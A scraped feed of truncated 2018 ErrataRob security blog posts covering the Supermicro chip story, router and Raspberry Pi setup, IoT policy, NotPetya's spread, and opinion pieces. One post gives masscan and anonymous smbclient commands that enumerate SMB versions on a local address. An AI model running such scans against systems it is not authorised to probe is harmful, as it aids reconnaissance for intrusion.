ErrataRob.webp 2018-10-04 16:36:51 Notes on the Bloomberg Supermicro supply chain hack story (lien direct) Bloomberg has a story how Chinese intelligence inserted secret chips into servers bound for America. There are a couple issues with the story I wanted to address.The story is based on anonymous sources, and not even good anonymous sources. An example is this attribution:a person briefed on evidence gathered during the probe saysThat means somebody not even involved, but somebody who heard a rumor. It also doesn't the person even had sufficient expertise to understand what they were being briefed about.The technical detail that's missing from the story is that the supply chain is already messed up with fake chips rather than malicious chips. Reputable vendors spend a lot of time ensuring quality, reliability, tolerances, ability to withstand harsh environments, and so on. Even the simplest of chips can command a price premium when they are well made.What happens is that other companies make clones that are cheaper and lower quality. They are just good enough to pass testing, but fail in the real world. They may not even be completely fake chips. They may be bad chips the original manufacturer discarded, or chips the night shift at the factory secretly ran through on the equipment -- but with less quality control.The supply chain description in the Bloomberg story is accurate, except that in fails to discuss how these cheap, bad chips frequently replace the more expensive chips, with contract manufacturers or managers skimming off the profits. Replacement chips are real, but whether they are for malicious hacking or just theft is the sticking point.For example, consider this listing for a USB-to-serial converter using the well-known FTDI chip. The word "genuine" is in the title, because fake FTDI chips are common within the supply chain. As you can see form the $11 price, the amount of money you can make with fake chips is low -- these contract manufacturers hope to make it up in volume.The story implies that Apple is lying in its denials of malicious hacking, and deliberately avoids this other supply chain issue. It's perfectly reasonable for Apple to have rejected Supermicro servers because of bad chips that have nothing to do with hacking.If there's hacking going on, it may not even be Chinese intelligence -- the manufacturing process is so lax that any intelligence agency could be responsible. Just because most manufacturing of server motherboards happen in China doesn't point the finger to Chinese intelligence as being the ones responsible.Finally, I want to point out the sensationalism of the story. It spends much effort focusing on the invisible nature of small chips, as evidence that somebody is trying to hide something. That the chips are so small means nothing: except for the major chips, all the chips on a motherboard are small. It's hard to have large chips, except for the big things like the CPU and DRAM. Serial ROMs containing firmware are never going to be big, because they just don't hold that much information.A fake serial ROM is the focus here not so much because that's the chip they found by accident, but that's the chip they'd look for. The chips contain the firmware for other hardware devices on the motherboard. Thus, instead of designing complex hardware to do malicious things, a hacker simply has to make simple changes t Hack
ErrataRob.webp 2018-09-28 18:52:32 Mini pwning with GL-iNet AR150 (lien direct) Seven years ago, before the $35 Raspberry Pi, hackers used commercial WiFi routers for their projects. They'd replace the stock firmware with Linux. The $22 TP-Link WR703N was extremely popular for these projects, being half the price and half the size of the Raspberry Pi.Unfortunately, these devices had extraordinarily limited memory (16-megabytes) and even more limited storage (4-megabyte). That's megabytes -- the typical size of an SD card in an RPi is a thousand times larger.I'm interested in that device for the simple reason that it has a big-endian CPU.All these IoT-style devices these days run ARM and MIPS processors, with a smattering of others like x86, PowerPC, ARC, and AVR32. ARM and MIPS CPUs can run in either mode, big-endian or little-endian. Linux can be compiled for either mode. Little-endian is by far the most popular mode, because of Intel's popularity. Code developed on little-endian computers sometimes has subtle bugs when recompiled for big-endian, so it's best just to maintain the same byte-order as Intel. On the other hand, popular file-formats and crypto-algorithms use big-endian, so there's some efficiency to be gained with going with that choice.I'd like to have a big-endian computer around to test my code with. In theory, it should all work fine, but as I said, subtle bugs sometimes appear.The problem is that the base Linux kernel has slowly grown so big I can no longer get things to fit on the WR703N, not even to the point where I can add extra storage via the USB drive. I've tried to hack a firmware but succeeded only in bricking the device.An alternative is the GL-AR150. This is a company who sells commercial WiFi products like the other vendors, but who caters to hackers and hobbyists. Recognizing the popularity of that TP-LINK device, they  essentially made a clone with more stuff, with 16-megabytes of storage and 64-megabytes of RAM. They intend for people to rip off the case and access the circuit board directly: they've included the pins for a console serial port to be directly connected, connectors of additional WiFi antennas, and pads for soldering wires to GPIO pins for hardware projects. It's a thing of beauty.So this post is about the steps I took to get things working for myself.The first step is to connect to the device. One way to do this is connect the notebook computer to their WiFi, then access their web-based console. Another way is to connect to their "LAN" port via Ethernet. I chose the Ethernet route.The problem with their Ethernet port is that you have to manually set your IP address. Their address is 192.168.8.1. I handled this by going into the Linux virtual-machine on my computer, putting the virtual network adapter into "bridge" mode (as I always do anyway), and setting an alternate IP address:# ifconfig eth:1 192.168.8.2 255.255.255.0The firmware I want to install is from the OpenWRT project which maintains Linux firmware replacements for over a hundred different devices. The device actually already uses their own variation of OpenWRT, but still, rather than futz with theirs I want to go with  a vanilla installation.https://wiki.openwrt.org/toh/gl-inet/gl-ar150I download this using the browser in my Linux VM, then browse to 19
ErrataRob.webp 2018-09-10 17:33:17 California\'s bad IoT law (lien direct) California has passed an IoT security bill, awaiting the government's signature/veto. It's a typically bad bill based on a superficial understanding of cybersecurity/hacking that will do little improve security, while doing a lot to impose costs and harm innovation.It's based on the misconception of adding security features. It's like dieting, where people insist you should eat more kale, which does little to address the problem you are pigging out on potato chips. The key to dieting is not eating more but eating less. The same is true of cybersecurity, where the point is not to add “security features” but to remove “insecure features”. For IoT devices, that means removing listening ports and cross-site/injection issues in web management. Adding features is typical “magic pill” or “silver bullet” thinking that we spend much of our time in infosec fighting against.We don't want arbitrary features like firewall and anti-virus added to these products. It'll just increase the attack surface making things worse. The one possible exception to this is “patchability”: some IoT devices can't be patched, and that is a problem. But even here, it's complicated. Even if IoT devices are patchable in theory there is no guarantee vendors will supply such patches, or worse, that users will apply them. Users overwhelmingly forget about devices once they are installed. These devices aren't like phones/laptops which notify users about patching.You might think a good solution to this is automated patching, but only if you ignore history. Many rate “NotPetya” as the worst, most costly, cyberattack ever. That was launched by subverting an automated patch. Most IoT devices exist behind firewalls, and are thus very difficult to hack. Automated patching gets beyond firewalls; it makes it much more likely mass infections will result from hackers targeting the vendor. The Mirai worm infected fewer than 200,000 devices. A hack of a tiny IoT vendor can gain control of more devices than that in one fell swoop.The bill does target one insecure feature that should be removed: hardcoded passwords. But they get the language wrong. A device doesn't have a single password, but many things that may or may not be called passwords. A typical IoT device has one system for creating accounts on the web management interface, a wholly separate authentication system for services like Telnet (based on /etc/passwd), and yet a wholly separate system for things like debugging interfaces. Just because a device does the proscribed thing of using a unique or user generated password in the user interface doesn't mean it doesn't also have a bug in Telnet.That was the problem with devices infected by Mirai. The description that these were hardcoded passwords is only a superficial understanding of the problem. The real problem was that there were different authentication systems in the web interface and in other services like Telnet. Most of the devices vulnerable to Mirai did the right thing on the web interfaces (meeting the language of this law) requiring the user to create new passwords before operating. They just did the wrong thing elsewhere.People aren't really paying attention to what happened with Mirai. They look at the 20 billion new IoT devices that are going to be connected to the Internet by 2020 and believe Mirai is just the tip of the iceberg. But it isn't. The IPv4 Internet has only 4 billion addresses, which are pretty much already used up. This means those 20 billion won't be exposed to the public Internet like Mirai devices, but hidden behind firewalls that translate addresses. Thus, rather than Mirai presaging the future, it represents the last gasp of the past that is unlikely to come again.This law is backwards looking rather than forward looking. Forward looking, by far the most important t Hack Threat Patching Guideline NotPetya Tesla
ErrataRob.webp 2018-08-29 22:22:49 Debunking Trump\'s claim of Google\'s SOTU bias (lien direct) Today, Trump posted this video proving Google promoted all of Obama "State of the Union" (SotU) speeches but none of his own. In this post, I debunk this claim. The short answer is this: it's not Google's fault but Trump's for not having a sophisticated social media team.#StopTheBias pic.twitter.com/xqz599iQZw- Donald J. Trump (@realDonaldTrump) August 29, 2018The evidence still exists at the Internet Archive (aka. "Wayback Machine") that archives copies of websites. That was probably how that Trump video was created, by using that website. We can indeed see that for Obama's SotU speeches, Google promoted them, such as this example of his January 12, 2016 speech:And indeed, if we check for Trump's January 30, 2018 speech, there's no such promotion on Google's homepage:But wait a minute, Google claims they did promote it, and there's even a screenshot on Reddit proving Google is telling the truth. Doesn't this disprove Trump?No, it actually doesn't, at least not yet. It's comparing two different things. In the Obama example, Google promoted hours ahead of time that there was an upcoming event. In the Trump example, they didn't do that. Only once the event went live did they mention it.I failed to notice this in my examples above because the Wayback Machine uses GMT timestamps. At 9pm EST when Trump gave his speech, it was 2am the next day in GMT. So picking the Wayback page from January 31st we do indeed see the promotion of the live event.Thus, Trump still seems to have a point: Google promoted Obama's speech better. They promoted his speeches hours ahead of time, but Trump's only after they went live.But ho
ErrataRob.webp 2018-08-27 01:56:09 Provisioning a headless Raspberry Pi (lien direct) The typical way of installing a fresh Raspberry Pi is to attach power, keyboard, mouse, and an HDMI monitor. This is a pain, especially for the diminutive RPi Zero. This blogpost describes a number of options for doing headless setup. There are several options for this, including Ethernet, Ethernet gadget, WiFi, and serial connection. These examples use a Macbook as an example, maybe I'll get around to a blogpost describing this from Windows.Burning micro SD cardWe are going to edit the SD card before booting, so for completeness, I thought I'd describe the process of burning an SD card.We are going to download the latest "raspbian" operating system. I download the "lite" version because I'm not using the desktop features. It comes as a compressed .zip file which we need to extract into an .img file. Just double-click on the .zip on Windows or Mac.The next step is to burn the image to an SD card. On Windows I use Win32DiskImager. On Mac I use the following command-line steps:$ sudo -s# mount# diskutil unmount /dev/disk2s1# dd bs=1m if=~/Downloads/2018-06-27-raspbian-stretch-lite.img of=/dev/disk2 conv=syncFirst, I need a root prompt. I then use the mount command to find out where the micro SD card is mounted in the file system. It's usually /dev/disk2s1, but could be disk3 or disk4 depending upon other things that may already be mounted on my Mac, such as USB drives or dmg files. It's important to know the correct drive because the dd utility is unforgiving of mistakes and can wipe out your entire drive. For gosh's sake, don't use disk1!!!! Remember dd stands for danger-danger (well, many claim it stands for disk-dump, but seriously, it's dangerous).The next step is to unmount the drive. Instead of the Unix umount utility use the diskutil unmount macOS tool.Now we use good ol' dd to copy the image over. The above example is my recently download raspbian image that's two months old. When you do this, it'll be a newer version with a different file name, so look in your ~/Downloads folder for the correct name.This takes a while to write to the SD card. You can type [ctrl-T] to see progress if you want.When we are done writing, don't eject the card. We are going to edit the contents as described below before we stick it into our Raspberry Pi. After running dd, it's going to become automatically mounted on your Mac, on mine it comes up as /Volumes/boot. When I say "root directory of the SD card" in the instructions below, I mean that directory.Troubleshooting: If you get the "Resource busy" error when running dd, it means you didn't unmount the drive. Go back and run diskutil unmount /dev/disk2s1 (or equivalent for whatever mount tell you which drive the SD card is using).You can use the "raw" disk instead of normal disk, such as /dev/rdisk2. I don't know what the tradeoffs are.EthernetThe RPi B comes with Ethernet built-in Guideline
ErrataRob.webp 2018-08-20 16:06:46 DeGrasse Tyson: Make Truth Great Again (lien direct) Neil deGrasse Tyson tweets the following:I'm okay with a US Space Force. But what we need most is a Truth Force - one that defends against all enemies of accurate information, both foreign & domestic.- Neil deGrasse Tyson (@neiltyson) August 20, 2018When people make comparisons with Orwell's "Ministry of Truth", he obtusely persists:A good start:  The National Academy of Sciences, which “…provides objective, science-based advice on critical issues affecting the nation."- Neil deGrasse Tyson (@neiltyson) August 20, 2018Given that Orwellian dystopias were the theme of this summer's DEF CON hacker conference, let's explore what's wrong with this idea.Truth vs. "Truth"I work in a corrupted industry, variously known as the "infosec" community or "cybersecurity" industry. It's a great example of how truth is corrupted into "Truth".At a recent government policy meeting, I pointed out how vendors often downplay the risk of bugs (vulnerabilities that can be exploited by hackers). When vendors are notified of these bugs and release a patch to fix them, they often give a risk rating. These ratings are often too low, in order to protect the corporate reputation. The representative from Oracle claimed that they didn't do that, and that indeed, they'll often overestimate the risk. Other vendors chimed in, also claiming they rated the risk higher than it really was.In a neutral world, deliberately overestimating the risk would be the same falsehood as deliberately underestimating it. But we live in a non-neutral world, where only one side is a lie, the middle is truth, and the other side is "Truth". Lying in the name of the "Truth" is somehow acceptable.Moreover, Oracle is famous for having downplayed the risk of significant bugs in the past, and is well-known in the industry as being the least trustworthy vendor as far as security of their products is concerned. Much of their policy efforts in Washington D.C. are focused on preventing their dirty laundry from being exposed. They aren't simply another vendor promoting "Truth", but a deliberately exploiting "Truth" to corrupt ends.That we should exaggerate the risks of cybersecurity, deliberately lie to people for their own good, is the uncontroversial consensus of our infosec/cybersec community. Most do it, few think this is wrong. Security is a moral imperative that justifies "Truth".The National Academy of ScientistsSo are we getting the truth or "Truth" from organizations like the National Academy of Scientists?The question here isn't global warming. That mankind's carbon emissions warms the climate is truth. We have a good understanding of how greenhouse gases work, as well as many measures of the climate showing that warming is occurring. The Arctic is steadily losing ice each summer.Instead, the question is "Global Warming", the claims made by politicians on the subject. Do politicians on the left fairly represent the truth, or are they the "Truth"?Which side is the National Academy of Sciences on? Are they committed to the truth, or (like the infosec/cybersec community) are they pursuing "Truth"? Is global warming a moral imperative that justifies playing loose with the facts?Googling "national academy of sciences climate chang Guideline APT 32
ErrataRob.webp 2018-08-08 20:09:17 That XKCD on voting machine software is wrong (lien direct) The latest XKCD comic on voting machine software is wrong, profoundly so. It's the sort of thing that appeals to our prejudices, but mistakes the details.Accidents vs. attackThe biggest flaw is that the comic confuses accidents vs. intentional attack. Airplanes and elevators are designed to avoid accidental failures. If that's the measure, then voting machine software is fine and perfectly trustworthy. Such machines are no more likely to accidentally record a wrong vote than the paper voting systems they replaced -- indeed less likely. The reason we have electronic voting machines in the first place was due to the "hanging chad" problem in the Bush v. Gore election of the year 2000. After that election, a wave of new, software-based, voting machines replaced the older inaccurate paper machines.The question is whether software voting machines can be attacked. Well, if that's the measure, then airplanes aren't safe at all. Security against human attack consists of the entire infrastructure outside the plane, such as TSA forcing us to take off our shoes, to trade restrictions to prevent the proliferation of Stinger missiles.Confusing the two, accidents vs. attack, is used here because it makes the reader feel superior. We get to mock and feel superior to those stupid software engineers for not living up to what's essentially a fictional standard of reliability.To repeat: software is better than the mechanical machines they replaced, which is why there are so many software-based machines in the United States. The issue isn't normal accuracy, but their robustness against a different standard, against attack -- a standard which airplanes and elevators suck at.The problems are as much hardware as softwareLast year at the DEF CON hacking conference they had an "Election Hacking Village" where they hacked a number of electronic voting machines. Most of those "hacks" were against the hardware, such as soldering on a JTAG device or accessing USB ports. Other errors have been voting machines being sold on eBay whose data wasn't wiped, allowing voter records to be recovered.What we want to see is hardware designed more like an iPhone, where the FBI can't decrypt a phone even when they really really want to. This requires special chips, such as secure enclaves, signed boot loaders, and so on. Only once we get the hardware right can we complain about the software being deficient.To be fair, software problems were also found at DEF CON, like an exploit over WiFi. Though, a lot of problems are questionable whether the fault lies in the software design or the hardware design, fixable in either one. The situation is better described as the entire design being flawed, from the "requirements",  to the high-level system "architecture", and lastly to the actual "software" code.It's lack of accountability/fail-safesWe imagine the threat is that votes can be changed in the voting machine, but it's more profound than that. The problem is that votes can be changed invisibly. The first change experts want to see is adding a paper trail, rather than fixing bugs.Consider "recounts". With many of today's electronic voting machines, this is meaningless, with nothing to recount. The machine produces a number, and we have nothing else to test against whether that number is correct or fa Hack Threat
ErrataRob.webp 2018-08-07 23:18:45 What the Caesars (@DefCon) WiFi situation looks like (lien direct) So I took a survey of WiFi at Caesar's Palace and thought I'd write up some results.When we go to DEF CON in Vegas, hundreds of us bring our WiFi tools to look at the world. Actually, no special hardware is necessary, as modern laptops/phones have WiFi built-in, while the operating system (Windows, macOS, Linux) enables “monitor mode”. Software is widely available and free. We still love our specialized WiFi dongles and directional antennas, but they aren't really needed anymore.It's also legal, as long as you are just grabbing header information and broadcasts. Which is about all that's useful anymore as encryption has become the norm -- we can pretty much only see what we are allowed to see. The days of grabbing somebody's session-cookie and hijacking their web email are long gone (though the was a fun period). There are still a few targets around if you want to WiFi hack, but most are gone.So naturally I wanted to do a survey of what Caesar's Palace has for WiFi during the DEF CON hacker conference located there.Here is a list of access-points (on channel 1 only) sorted by popularity, the number of stations using them. These have mind-blowing high numbers in the ~3000 range for “CAESARS”. I think something is wrong with the data.I click on the first one to drill down, and I find a source of the problem. I'm seeing only “Data Out” packets from these devices, not “Data In”.These are almost entirely ARP packets from devices, associated with other access-points, not actually associated with this access-point. The hotel has bridged (via Ethernet) all the access-points together. We can see this in the raw ARP packets, such as the one shown below:WiFi packets have three MAC addresses, the source and destination (as expected) and also the address of the access-point involved. The access point is the actual transmitter, but it's bridging the packet from some other location on the local Ethernet network.Apparently, CAESARS dumps all the guests into the address range 10.10.x.x, all going out through the router 10.10.0.1. We can see this from the ARP traffic, as everyone seems to be ARPing that router.I'm probably seeing all the devices on the CAESARS WiFi. In ot Patching
ErrataRob.webp 2018-07-27 16:55:05 Some changes in how libpcap works you should know (lien direct) I thought I'd document the solution to this problem I had.The API libpcap is the standard cross-platform way of sniffing packets off the network. It works on Windows (winpcap), macOS, and all the Unixes. It's better than simply opening a "raw socket" on Unix platforms because it takes advantage of higher performance capabilities of the system, including specialized sniffing hardware.Traditionally, you'd open an adapter with pcap_open(), whose function parameters set options like snap length, promiscuous mode, and timeouts.However, in newer versions of the API, what you should do instead is call pcap_create(), then set the options individually with calls to functions like pcap_set_timeout(), then once you are ready to start capturing, call pcap_activate().I mention this in relation to "TPACKET" and pcap_set_immediate_mode().Over the years, Linux has been adding a "ring buffer" mode to packet capture. This is a trick where a packet buffer is memory mapped between user-space and kernel-space. It allows a packet-sniffer to pull packets out of the driver without the overhead of extra copies or system calls that cause a user-kernel space transition. This has gone through several generations.One of the latest generations causes the pcap_next() function to wait forever for a packet. This happens a lot on virtual machines where there is no background traffic on the network.This looks like a bug, but maybe it isn't.  It's unclear what the "timeout" parameter actually means. I've been hunting down the documentation, and curiously, it's not really described anywhere. For an ancient, popular APIs, libpcap is almost entirely undocumented as to what it precisely does. I've tried reading some of the code, but I'm not sure I've come to any understanding.In any case, the way to resolve this is to call the function pcap_set_immediate_mode(). This causes libpccap to backoff and use an older version of TPACKET such that it'll work as expected, that even on silent networks the pcap_next() function will timeout and return.I mention this because I fixed this bug in my code. When running inside a VM, my program would never exit. I changed from pcap_open_live() to the pcap_create()/pcap_activate() method instead, adding the setting of "immediate mode", and now things work. Performance seems roughly the same as far as I can tell.I'm still not certain what's going on here, and there are even newer proposed zero-copy/ring-buffer modes being added to the Linux kernel, so this can change in the future. But in any case, I thought I'd document this in a blogpost in order to help out others who might be encountering the same problem.
ErrataRob.webp 2018-07-12 19:54:20 Your IoT security concerns are stupid (lien direct) Lots of government people are focused on IoT security, such as this recent effort. They are usually wrong. It's a typical cybersecurity policy effort which knows the answer without paying attention to the question.Patching has little to do with IoT security. For one thing, consumers will not patch vulns, because unlike your phone/laptop computer which is all "in your face", IoT devices, once installed, are quickly forgotten. For another thing, the average lifespan of a device on your network is at least twice the duration of support from the vendor making patches available.Naive solutions to the manual patching problem, like forcing autoupdates from vendors, increase rather than decrease the danger. Manual patches that don't get applied cause a small, but manageable constant hacking problem. Automatic patching causes rarer, but more catastrophic events when hackers hack the vendor and push out a bad patch. People are afraid of Mirai, a comparatively minor event that led to a quick cleansing of vulnerable devices from the Internet. They should be more afraid of notPetya, the most catastrophic event yet on the Internet that was launched by subverting an automated patch of accounting software.Vulns aren't even the problem. Mirai didn't happen because of accidental bugs, but because of conscious design decisions. Security cameras have unique requirements of being exposed to the Internet and needing a remote factory reset, leading to the worm. While notPetya did exploit a Microsoft vuln, it's primary vector of spreading (after the subverted update) was via misconfigured Windows networking, not that vuln. In other words, while Mirai and notPetya are the most important events people cite supporting their vuln/patching policy, neither was really about vuln/patching.Such technical analysis of events like Mirai and notPetya are ignored. Policymakers are only cherrypicking the superficial conclusions supporting their goals. They assiduously ignore in-depth analysis of such things because it inevitably fails to support their positions, or directly contradicts them.IoT security is going to be solved regardless of what government does. All this policy talk is premised on things being static unless government takes action. This is wrong. Government is still waffling on its response to Mirai, but the market quickly adapted. Those off-brand, poorly engineered security cameras you buy for $19 from Amazon.com shipped directly from Shenzen now look very different, having less Internet exposure, than the ones used in Mirai. Major Internet sites like Twitter now use multiple DNS providers so that a DDoS attack on one won't take down their services.In addition, technology is fundamentally changing. Mirai attacked IPv4 addresses outside the firewall. The 100-billion IoT devices going on the network in the next decade will not work this way, cannot work this way, because there are only 4-billion IPv4 addresses. Instead, they'll be behind NATs or accessed via IPv6, both of which prevent Mirai-style worms from functioning. Your fridge and toaster won't connect via your home WiFi anyway, but via a 5G chip unrelated to your home.Lastly, focusing on the ven Hack Patching Guideline NotPetya
ErrataRob.webp 2018-06-27 15:49:15 Lessons from nPetya one year later (lien direct) This is the one year anniversary of NotPetya. It was probably the most expensive single hacker attack in history (so far), with FedEx estimating it cost them $300 million. Shipping giant Maersk and drug giant Merck suffered losses on a similar scale. Many are discussing lessons we should learn from this, but they are the wrong lessons.An example is this quote in a recent article:"One year on from NotPetya, it seems lessons still haven't been learned. A lack of regular patching of outdated systems because of the issues of downtime and disruption to organisations was the path through which both NotPetya and WannaCry spread, and this fundamental problem remains." This is an attractive claim. It describes the problem in terms of people being "weak" and that the solution is to be "strong". If only organizations where strong enough, willing to deal with downtime and disruption, then problems like this wouldn't happen.But this is wrong, at least in the case of NotPetya.NotPetya's spread was initiated through the Ukraining company MeDoc, which provided tax accounting software. It had an auto-update process for keeping its software up-to-date. This was subverted in order to deliver the initial NotPetya infection. Patching had nothing to do with this. Other common security controls like firewalls were also bypassed.Auto-updates and cloud-management of software and IoT devices is becoming the norm. This creates a danger for such "supply chain" attacks, where the supplier of the product gets compromised, spreading an infection to all their customers. The lesson organizations need to learn about this is how such infections can be contained. One way is to firewall such products away from the core network. Another solution is port-isolation/microsegmentation, that limits the spread after an initial infection.Once NotPetya got into an organization, it spread laterally. The chief way it did this was through Mimikatz/PsExec, reusing Windows credentials. It stole whatever login information it could get from the infected machine and used it to try to log on to other Windows machines. If it got lucky getting domain administrator credentials, it then spread to the entire Windows domain. This was the primary method of spreading, not the unpatched ETERNALBLUE vulnerability. This is why it was so devastating to companies like Maersk: it wasn't a matter of a few unpatched systems getting infected, it was a matter of losing entire domains, including the backup systems.Such spreading through Windows credentials continues to plague organizations. A good example is the recent ransomware infection of the City of Atlanta that spread much the same way. The limits of the worm were the limits of domain trust relationships. For example, it didn't infect the city airport because that Windows domain is separate from the city's domains.This is the most pressing lesson organizations need to learn, the one they are ignoring. They need to do more to prevent desktops from infecting each other, such as through port-isolation/microsegmentation. They need to control the spread of administrative credentials within the organization. A lot of organizations put the same local admin account on every workstation which makes the spread of NotPetya style worms trivial. They need to reevaluate trust relationships between domains, so that the admin of one can't infect the others.These solutions are difficult, which is why news articles don't mention them. You don't have to know anything about security to proclaim "the problem is lack of patches". It's moral authority, chastising the weak, rather than a proscription of what to do. Solving supply chain hacks and Windows credential sharing, though, is hard. I don't know any universal solution to this -- I'd have to thoroughly analyze your network and business in order to Ransomware Malware Patching FedEx NotPetya Wannacry
ErrataRob.webp 2018-06-24 19:39:21 SMB version detection in masscan (lien direct) My Internet-scale port scanner, masscan, supports "banner checking", grabbing basic information from a service after it connects to a port. It's less comprehensive than nmap's version and scripting checks, but it's better than just recording which ports are open.I recently extended this banner checking to include SMB. It's a complicated protocol so requires a lot more work than just grabbing text banners like you see on FTP. Implementing this, I've found that nmap and smbclient often fail to get version information. They seem focused on getting the information from a standard location in SMBv1 packets, which gives a text string indicating version. There's another place you get get it, from the NTLMSSP pluggable authentication chunks, which gives version numbers in the form of major version, minor version. and build number. Sometimes the SMBv1 information is missing, either because newer Windows version disable SMBv1 by default (supporting only SMBv2) or because they've disabled null/anonymous sessions. They still give NTLMSSP version info, though.For example, running masscan in my local bar, I get the following result:Banner on port 445/tcp on 10.1.10.200: [smb] SMBv1  time=2018-06-24 22:18:13 TZ=+240  domain=SHIPBARBO version=6.1.7601 ntlm-ver=15 domain=SHIPBARBO name=SHIPBARBO domain-dns=SHIPBARBO name-dns=SHIPBARBO os=Windows Embedded Standard 7601 Service Pack 1 ver=Windows Embedded Standard 6.1The top version string comes from NTLMSSP, with 6.1.7601, which means Windows 6.1 (Win7) build number 7601. The bottom version string comes from the SMBv1 packets, which consists of strings.The nmap and smbclient programs will get the SMBv1 part, but not the NTLMSSP part.This seems to be a problem with Rapid7's "National Exposure Index" which tracks SMB exposure (amongst other things). It's missing about 300,000 machines that report NT_STATUS_ACCESS_DENIED from smbclient rather than the numeric version info from NTLMSSP authentication.The smbclient information does have the information internally. For example, you could run the following command to put the debug level at '10' to grab it:$ smbclient -U "" -N -L 10.1.10.95 -d10You'll get something like the following output:It appears to get the Windows 6.1 numbers, though for some reason it's missing the build number.To run masscan to grab this, run:# masscan --banners -p445 10.1.10.95In the above example, I also used the "--hello smbv1" parameter, to grab both the SMBv1 and NTLMSSP version info. Otherwise, it'll default to SMBv2 if available, and only return: Tool
ErrataRob.webp 2018-06-17 01:45:55 Notes on "The President is Missing" (lien direct) Former president Bill Clinton has contributed to a cyberthriller "The President is Missing", the plot of which is that the president stops a cybervirus from destroying the country. This is scary, because people in Washington D.C. are going to read this book, believe the hacking portrayed has some basis in reality, and base policy on it. This "news analysis" piece in the New York Times is a good example, coming up with policy recommendations based on fictional cliches rather than a reality of what hackers do.The cybervirus in the book is some all powerful thing, able to infect everything everywhere without being detected. This is fantasy no more real than magic and faeries. Sure, magical faeries is a popular basis for fiction, but in this case, it's lazy fantasy, a cliche. In fiction, viruses are rarely portrayed as anything other than all powerful.But in the real world, viruses have important limitations. If you knew anything about computer viruses, rather than being impressed by what they can do, you'd be disappointed by what they can't.Go look at your home router. See the blinky lights. The light flashes every time a packet of data goes across the network. Packets can't be sent without a light blinking. Likewise, viruses cannot spread themselves over a network, or communicate with each other, without somebody noticing -- especially a virus that's supposedly infected a billion devices as in the book.The same is true of data on the disk. All the data is accounted for. It's rather easy for professionals to see when data (consisting of the virus) has been added. The difficulty of anti-virus software is not in detecting when something new has been added to a system, but automatically determining whether it's benign or malicious. When viruses are able to evade anti-virus detection, it's because they've been classified as non-hostile, not because they are invisible.Such evasion only works when hackers have a focused target. As soon as a virus spreads too far, anti-virus companies will get a sample, classify as malicious, and spread the "signatures" out to the world. That's what happened with Stuxnet, a focused attack on Iran's nuclear enrichment program that eventually spread too far and got detected. It's implausible that anything can spread to a billion systems without anti-virus companies getting a sample and correctly classifying it.In the book, the president creates a team of the 30 brightest cybersecurity minds the country has, from government, the private sector, and even convicted hackers on parole from jail -- each more brilliant than the last. This is yet another lazy cliche about genius hackers.The cliche comes from the fact that it's rather easy to impress muggles with magic tricks. As soon as somebody shows an ability to do something you don't know how to do, they become a cyber genius in your mind. The reality is that cybersecurity/hacking is no different than any other profession, no more dominated by "genius" than bridge engineering or heart surgery. It's a skill that takes both years of study as well as years of experience.So whenever the president, ignorant of computers, puts together a team of 30 cyber geniuses, they aren't going to be people of competence. They are going to be people good at promoting themselves, taking credit for other people's work, or political engineering. They won't be technical experts, they'll be people like Rudi Giuliani or Richard Clarke, who have been tapped by presidents as cyber experts despite knowing less than nothing about computers.A funny example of this is Marcus Hutchins. He's a virus researcher of typical skill and experience, but was catapulted to fame by finding the "kill switch" in the famous Wannacry virus. In truth, he just got lucky, being just the first to find the kill switch that would've soon been found by ano Wannacry
ErrataRob.webp 2018-05-31 17:06:26 The First Lady\'s bad cyber advice (lien direct) First Lady Melania Trump announced a guide to help children go online safely. It has problems.Melania's guide is full of outdated, impractical, inappropriate, and redundant information. But that's allowed, because it relies upon moral authority: to be moral is to be secure, to be moral is to do what the government tells you. It matters less whether the advice is technically accurate, and more that you are supposed to do what authority tells you.That's a problem, not just with her guide, but most cybersecurity advice in general. Our community gives out advice without putting much thought into it, because it doesn't need thought. You should do what we tell you, because being secure is your moral duty.This post picks apart Melania's document. The purpose isn't to fine-tune her guide and make it better. Instead, the purpose is to demonstrate the idea of resting on moral authority instead of technical authority.Strong Passwords"Strong passwords" is the quintessential cybersecurity cliché that insecurity is due to some "weakness" (laziness, ignorance, greed, etc.) and the remedy is to be "strong".The first flaw is that this advice is outdated. Ten years ago, important websites would frequently get hacked and have poor password protection (like MD5 hashing). Back then, strength mattered, to stop hackers from brute force guessing the hacked passwords. These days, important websites get hacked less often and protect the passwords better (like salted bcrypt). Moreover, the advice is now often redundant: websites, at least the important ones, enforce a certain level of password complexity, so that even without advice, you'll be forced to do the right thing most of the time.This advice is outdated for a second reason: hackers have gotten a lot better at cracking passwords. Ten years ago, they focused on brute force, trying all possible combinations. Partly because passwords are now protected better, dramatically reducing the effectiveness of the brute force approach, hackers have had to focus on other techniques, such as the mutated dictionary and Markov chain attacks. Consequently, even though "Password123!" seems to meet the above criteria of a strong password, it'll fall quickly to a mutated dictionary attack. The simple recommendation of "strong passwords" is no longer sufficient.The last part of the above advice is to avoid password reuse. This is good advice. However, this becomes impractical advice, especially when the user is trying to create "strong" complex passwords as described above. There's no way users/children can remember that many passwords. So they aren't going to follow that advice.To make the advice work, you need to help users with this problem. To begin with, you need to tell them to write down all their passwords. This is something many people avoid, because they've been told to be "strong" and writing down passwords seems "weak". Indeed it is, if you write them down in an office environment and stick them on a note on the monitor or underneath the keyboard. But they are safe and strong if it's on paper stored in your home safe, or even in a home office drawer. I write my passwords on the margins in a
ErrataRob.webp 2018-05-23 18:45:27 The devil wears Pravda (lien direct) Classic Bond villain, Elon Musk, has a new plan to create a website dedicated to measuring the credibility and adherence to "core truth" of journalists. He is, without any sense of irony, going to call this "Pravda". This is not simply wrong but evil.Musk has a point. Journalists do suck, and many suck consistently. I see this in my own industry, cybersecurity, and I frequently criticize them for their suckage.But what he's doing here is not correcting them when they make mistakes (or what Musk sees as mistakes), but questioning their legitimacy. This legitimacy isn't measured by whether they follow established journalism ethics, but whether their "core truths" agree with Musk's "core truths".An example of the problem is how the press fixates on Tesla car crashes due to its "autopilot" feature. Pretty much every autopilot crash makes national headlines, while the press ignores the other 40,000 car crashes that happen in the United States each year. Musk spies on Tesla drivers (hello, classic Bond villain everyone) so he can see the dip in autopilot usage every time such a news story breaks. He's got good reason to be concerned about this.He argues that autopilot is safer than humans driving, and he's got the statistics and government studies to back this up. Therefore, the press's fixation on Tesla crashes is illegitimate "fake news", titillating the audience with distorted truth.But here's the thing: that's still only Musk's version of the truth. Yes, on a mile-per-mile basis, autopilot is safer, but there's nuance here. Autopilot is used primarily on freeways, which already have a low mile-per-mile accident rate. People choose autopilot only when conditions are incredibly safe and drivers are unlikely to have an accident anyway. Musk is therefore being intentionally deceptive comparing apples to oranges. Autopilot may still be safer, it's just that the numbers Musk uses 